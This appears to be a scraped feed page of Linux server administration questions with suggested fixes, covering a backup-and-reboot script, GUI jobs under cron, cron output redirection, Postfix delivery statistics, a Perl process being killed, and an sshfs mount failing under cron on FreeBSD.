      /etc/init.d/zimbra stop
      sleep 60s
      rsync $RSYNC_OPTS /opt $RSYNC_DEST
      touch $TIMESTAMP2
      rsync $RSYNC_OPTS $TIMESTAMP2 $RSYNC_DEST
      echo `date +%Y%m%d%H%M` >> /var/log/reset
      reboot
      # $# shows number of args passed
      # $1 to access first variable
      #if [ $# -eq 1 ]; then
      #  if [ $1 = "withreboot" ]; then
      #    echo "rebooting...";
      #    echo `date +%Y%m%d%H%M` >> /var/log/reset
      #    /sbin/reboot
      #  fi
      #fi
    I have tried using init 6 rather than reboot. I have tried /sbin/reboot. I also have another basic script that just echoes to the reset log and runs reboot without issue. It is just with the script above that the server won't restart. If anyone has any theories that would be great, as I have run out of ideas. Thanks, Jon
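
    Since the echo into /var/log/reset works but the reboot never happens, one next step (a debugging sketch, not a known fix) is to capture what reboot itself says when invoked from this script, and to try a delayed shutdown so the script and any lingering rsync/zimbra children can exit cleanly first:
      echo `date +%Y%m%d%H%M` >> /var/log/reset
      /sbin/reboot >> /var/log/reset 2>&1
      echo "reboot exit status: $?" >> /var/log/reset
      # or give everything a minute to wind down instead of rebooting immediately:
      /sbin/shutdown -r +1 "rebooting after backup" >> /var/log/reset 2>&1
    Whatever lands in /var/log/reset after the next run should show whether reboot is failing outright or being blocked by something the stop scripts left behind.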

    Read the article

  • Run GUI application via cronjob in Ubuntu?

    - by Christoffer
    Hi, I have a remote server running "Ubuntu 10.04 Desktop". From it I want to run a script that walks through a list of websites and captures screenshots of them. The script is working and thoroughly tested. When I SSH to the server with ssh -X user@ip-adress I can run my script by calling ./myscript.py and everything will work OK. I then modifed my crontab file and added... 59 17 * * * env DISPLAY=:0 /path/to/myscript.py ...as recommended by the Ubuntu WIKI. I can see in the /var/log/syslog that my cron job is started, but it doesn't capture any screenshots. When running env DISPLAY=:0 /path/to/myscript.py from the shell I get No protocol specified myscript.py: cannot connect to X server :0 If I ssh to the server without the -X option I only get the second row of the error: myscript.py: cannot connect to X server :0 What can I try now? More details I have run xhost +local: and checked the output of xhost to see that the option was set correctly. If I run ls /tmp/.X11-unix/ the output is X0 The server only has one screen. Thank you in advance!
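
    "No protocol specified" means the X server refused the connection for lack of credentials rather than for lack of a display. Cron has no X authority cookie, so one common approach (a sketch; the username and cookie path are placeholders for whichever account owns the desktop session on :0) is to point the job at that user's .Xauthority:
      59 17 * * * env DISPLAY=:0 XAUTHORITY=/home/<desktop user>/.Xauthority /path/to/myscript.py
    Running the job from that same user's crontab often removes the need for xhost tricks entirely; another route that avoids the live display altogether is a virtual framebuffer, e.g. xvfb-run /path/to/myscript.py.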

    Read the article

  • Why is cron mailing me program output even though I've redirected to /dev/null?

    - by Server Fault
    I'm trying to restart a system process through cron and getting emailed the startup output of the process. I thought redirecting STDOUT and STDERR to /dev/null would "silence" the output, but alas, this has not worked. How can I get cron to silently restart this service?
    crontab entry:
      0 6 * * * service sympa stop &>/dev/null; service sympa start &> /dev/null
    Sample output from the restart email:
      Stopping Sympa bounce manager bounced ...done.
      * Stopping Sympa task manager task_manager ...done.
      * Stopping Sympa mailing list archive manager archived ...done.
      * Stopping Sympa mailing list manager sympa ...done.
      ... waiting
      Prototype mismatch: sub Lock::LOCK_SH () vs none at /home/sympa/bin/Lock.pm line 38.
      Constant subroutine LOCK_SH redefined at /home/sympa/bin/Lock.pm line 38.
      Prototype mismatch: sub Lock::LOCK_EX () vs none at /home/sympa/bin/Lock.pm line 39.
      Constant subroutine LOCK_EX redefined at /home/sympa/bin/Lock.pm line 39.
      Prototype mismatch: sub Lock::LOCK_NB () vs none at /home/sympa/bin/Lock.pm line 40.
      Constant subroutine LOCK_NB redefined at /home/sympa/bin/Lock.pm line 40.
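
    The likely culprit is that cron runs jobs with /bin/sh, where &> is not the bash "redirect both streams" operator; in a POSIX shell, cmd &>/dev/null parses as "run cmd in the background, then truncate /dev/null", so nothing actually gets redirected. A portable rewrite of the entry (same commands, only the redirections changed):
      0 6 * * * service sympa stop >/dev/null 2>&1; service sympa start >/dev/null 2>&1
    Alternatively, putting SHELL=/bin/bash at the top of the crontab keeps the &> syntax working as intended.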

    Read the article

  • postfix received and delivered have the same values (?)

    - by thinkingbig
    I have configured my first server (Debian with ISPConfig). Generally I want to send bulk e-mails to our users, so I configured and started Postfix... but after 1 hour of sending emails I have logs like this:
      Grand Totals
      messages
        21886   received
        21883   delivered
            0   forwarded
            0   deferred
          234   bounced
            0   rejected (0%)
            0   reject warnings
            0   held
            0   discarded (0%)
       30805k   bytes received
       31280k   bytes delivered
            3   senders
            3   sending hosts/domains
        12588   recipients
            3   recipient hosts/domains

      Per-Hour Traffic Summary
      time          received  delivered  deferred  bounced  rejected
      --------------------------------------------------------------------
      0000-0100            0          0         0        0         0
      0100-0200            0          0         0        0         0
      0200-0300            0          0         0        0         0
      0300-0400            0          0         0        0         0
      0400-0500            0          0         0        0         0
      0500-0600            0          0         0        0         0
      0600-0700            0          0         0        0         0
      0700-0800            0          0         0        0         0
      0800-0900            0          0         0        0         0
      0900-1000            0          0         0        0         0
      1000-1100            0          0         0        0         0
      1100-1200            0          0         0        0         0
      1200-1300            0          0         0        0         0
      1300-1400            0          0         0        0         0
      1400-1500            0          0         0        0         0
      1500-1600        15311      15306         0      168         0
      1600-1700         6575       6577         0       66         0
      1700-1800            0          0         0        0         0
      1800-1900            0          0         0        0         0
      1900-2000            0          0         0        0         0
      2000-2100            0          0         0        0         0
      2100-2200            0          0         0        0         0
      2200-2300            0          0         0        0         0
      2300-2400            0          0         0        0         0

      Host/Domain Summary: Message Delivery
      sent cnt   bytes   defers   avg dly   max dly   host/domain
      21521      30353k  0        3.4 m     15.5 m    wp.pl
      355        919k    0        54.9 s    13.0 m    mysenderdomainexample.pl
      7          8477    0        1.7 s     1.9 s     prokonto.pl

      Host/Domain Summary: Messages Received
      msg cnt    bytes   host/domain
      21879      30786k  mysenderdomainexample.pl
      5          16196   mx4.wp.pl
      1          3200    mx3.wp.pl

      Senders by message count
      21783  [email protected]
      96     [email protected]
      6      from=<
    So, my questions are:
    1) Why do received and delivered have (approximately) the same values?
    2) How can I check whether an email has actually been delivered?
    3) How do I change the default "root" and "www-data" users (From / Return-Path) to another address? I have changed this in the script, but Postfix ignores the script's values and sends every mail from root (we have PHP send crons in /etc/crontab).
    4) Why have approximately 100% of received mails been addressed to my own sender host (see Host/Domain Summary: Messages Received)?
    Waiting for a response. Regards, TB

    Read the article

  • I have a perl script that is supposed to run indefinitely. It's being killed... how do I determine who or what kills it?

    - by John O
    I run the perl script in screen (I can log in and check debug output). Nothing in the logic of the script should be capable of killing it quite this dead. I'm one of only two people with access to the server, and the other guy swears that it isn't him (and we both have quite a bit of money riding on it continuing to run without a hitch). I have no reason to believe that some hacker has managed to get a shell or anything like that. I have very little reason to suspect the admins of the host operation (bandwidth/cpu-wise, this script is pretty lightweight). Screen continues to run, but at the end of the output of the perl script I see "Killed" and it has dropped back to a prompt. How do I go about testing what is whacking the damn thing? I've checked crontab, nothing in there that would kill random/non-random processes. Nothing in any of the log files gives any hint. It will run from 2 to 8 hours, it would seem (and on my mac at home, it will run well over 24 hours without a problem). The server is running Ubuntu version something or other, I can look that up if it matters.
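
    A process that dies with a bare "Killed" and nothing in its own logs is very often the kernel's OOM killer, which leaves a trace in the kernel log even when nothing else does. A quick check, plus a way to record the script's footprint going forward (a sketch; log paths vary slightly between Ubuntu releases, and the 5-minute interval is arbitrary):
      dmesg | egrep -i 'killed process|out of memory'
      grep -i 'oom\|killed process' /var/log/kern.log /var/log/syslog 2>/dev/null | tail
      # record memory use over time so growth is visible before the next kill
      while sleep 300; do date >> /tmp/perl-mem.log; ps -o pid,rss,vsz,etime,args -C perl >> /tmp/perl-mem.log; done &
    If the OOM killer is not the answer, auditd or a shell wrapper that logs the script's exit status and signal (echo "exited: $?" after running it in the foreground) narrows down whether it is being signalled from outside.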

    Read the article

  • How do you set up CRON?

    - by user1723760
    I have never used cron before, but I want to use it to perform scheduled jobs for a PHP script. The PHP script is called inactivesession.php and contains this code:
      <?php
      include('connect.php');
      $createDate = mktime(0,0,0,10,25,date("Y"));
      $selectedDate = date('d-m-Y', ($createDate));
      $sql = "UPDATE Session SET Active = ? WHERE DATE_FORMAT(SessionDate,'%Y-%m-%d' ) <= ?";
      $update = $mysqli->prepare($sql);
      $update->bind_param("is", 0, $selectedDate);
      $update->execute();
      ?>
    What I want is that when the above date is reached (25th Oct), the script performs the UPDATE statement. But my question is: how do I use cron to do this? The server I am using is the university's server, known as helios. Does cron need to be set up on helios (do I have to call the admin for this), or is it something else that uses cron? I have never used cron before, so can you explain how cron can be set up for the example above on the server I am using? Thanks
    UPDATE: I think the name of the OS is actually helios, but I am not sure; I have a Wikipedia page on this: here. I will read the crontab Wikipedia page and see what I can find, but my question is: is cron already set up, so that I can just go right ahead and use it, or do I need to set it up first?
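
    On a typical Linux/Unix shell account, cron is already running as a system service and each user simply edits their own table with crontab -e; the admin only needs to get involved if crontab access has been restricted. A minimal sketch for this case (the php binary path, script location, and log file are assumptions to adapt to the account on helios):
      crontab -e
      # then add a line like this to run the script at 00:05 on 25 October:
      5 0 25 10 * /usr/bin/php /home/youruser/inactivesession.php >> /home/youruser/cron.log 2>&1
      crontab -l    # verify the entry was saved
    The five fields are minute, hour, day of month, month, and day of week; redirecting output to a log file keeps cron from mailing it and gives you something to check afterwards.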

    Read the article

  • Mounting fuse sshfs fails when invoked by Cron on FreeBSD 9.0

    - by Tal
    I have a remote server filesystem that I'm attempting to mount locally on a FreeBSD 9 machine via FUSE sshfs, with cron driving a backup routine. I have ssh keys between the boxes set up to allow passwordless login as the root user on the local machine. Cron is set to run the following script (in root's crontab):
      #!/bin/sh
      echo "Mounting Share"
      /usr/local/bin/sshfs -C -o reconnect -o idmap=user -o workaround=all <remote user>@<remote domain>.com: /mnt/remote_server
    As root, I can run this script on the command line without issue, and without being asked for a password the share mounts successfully. Yet when run by cron, the script fails. The path to sshfs is identical to the value of which sshfs. Here is the email root receives from the cron daemon:
      X-Cron-Env: <SHELL=/bin/sh>
      X-Cron-Env: <HOME=/root>
      X-Cron-Env: <PATH=/usr/bin:/bin>
      X-Cron-Env: <LOGNAME=root>
      X-Cron-Env: <USER=root>
      Mounting Share
      fuse: failed to exec mount program: No such file or directory
      fuse: failed to mount file system: No such file or directory
    I'm stumped as to why I'm receiving "No such file or directory" in this instance. It further seems odd given that the paths appear to be correct. I've also attempted to compare the output of env on the shell with env inserted into the script, and I don't see any environment variables that should cause this trouble. At bootup, FUSE reports its version as:
      fuse4bsd: version 0.3.9-pre1, FUSE ABI 7.8
    Help me ServerFault wizards, you're my only hope!
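
    Note that the cron environment shown above only has PATH=/usr/bin:/bin, and "failed to exec mount program" comes from FUSE trying to run its mount helper (mount_fusefs on FreeBSD), which typically lives outside that PATH. A hedged fix is to widen the PATH inside the script before calling sshfs; the exact helper location may differ on this install, so the list below is deliberately broad:
      #!/bin/sh
      # cron's default PATH is /usr/bin:/bin; add the sbin and local dirs where mount_fusefs may live
      PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin
      export PATH
      echo "Mounting Share"
      /usr/local/bin/sshfs -C -o reconnect -o idmap=user -o workaround=all <remote user>@<remote domain>.com: /mnt/remote_server
    Running which mount_fusefs from an interactive root shell confirms which directory actually needs to be on the PATH.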

    Read the article

  • Linux Centos 6 becomes unavailable from time to time - OS&network issue

    - by adoado0
    I am encountering the following problem. There is one server (DL160 G5) running CentOS 6.3 with the default kernel 2.6.32-220.2.1.el6.x86_64 - at this point I'd like to add that the issue also appeared on the older version, 6.1, with an older kernel (I do not remember exactly which one). cPanel is installed, and from time to time the machine becomes unavailable over the network. What I've checked (via KVM-over-IP) when the problem occurs:
      - load average is completely normal
      - it does not lack memory or disk space
      - no console notifications
      - all access logs checked; no sign that it could be caused by a client script
      - cannot even access the local interface (127.0.0.1) or the main IP address
      - running tcpdump, I can only see packets arriving at the server - no responses
      - all services seem to be running properly (mail, sql, http, ssh)
      - checked crontab and all clients' crontabs too
      - network port utilisation is low (up to several Mbit/s)
      - arriving packet rate is low - hundreds per second (according to tcpdump)
      - the console (via KVM-over-IP) works fine, no lags
      - there is no conntrack on this server
      - there is no IPv6 on this server
      - flushing iptables and unloading modules does not resolve the problem
      - restarting the network does not resolve the problem; no errors appear
      - it occurs both when two separate networks (and multiple gateways) are configured and when just one IP, one default gateway and one network are configured, so it seems independent of the network configuration
      - it seems to repeat randomly (independent of load, packet rate, or bandwidth usage)
      - the server has been checked with different rootkit detection tools; it seems to be clean
      - the server has been rebooted; it did not change anything
      - there are no interface errors
      - it appears randomly, sometimes once a week, sometimes several times per day
    It usually works fine again after 1-15 minutes. What else can I check? It is definitely an OS issue - there is traffic at the interface in only one direction when the problem occurs, and I cannot even ping loopback. Any ideas? Recommended checks? Anything I did not check above?
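
    Since the console keeps working while the network stack stops answering, one practical step (a sketch; paths and the one-minute interval are arbitrary) is a cron'd collector that snapshots network-stack state, so that after the next incident there is data from just before and during it:
      #!/bin/sh
      # /usr/local/bin/netwatch.sh - run from /etc/cron.d: * * * * * root /usr/local/bin/netwatch.sh
      OUT=/var/log/netwatch/$(date +%Y%m%d-%H%M).log
      mkdir -p /var/log/netwatch
      {
        date
        ip -s link                   # per-interface packet, error and drop counters
        ss -s                        # socket summary
        cat /proc/net/softnet_stat   # per-CPU backlog/drop counters
        dmesg | tail -30
      } > "$OUT" 2>&1
    Comparing the snapshot taken during a hang with the one from a minute earlier shows whether packets are being dropped by the NIC driver or never make it up the stack at all, which is the key fork in the road for this kind of one-way-traffic symptom.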

    Read the article
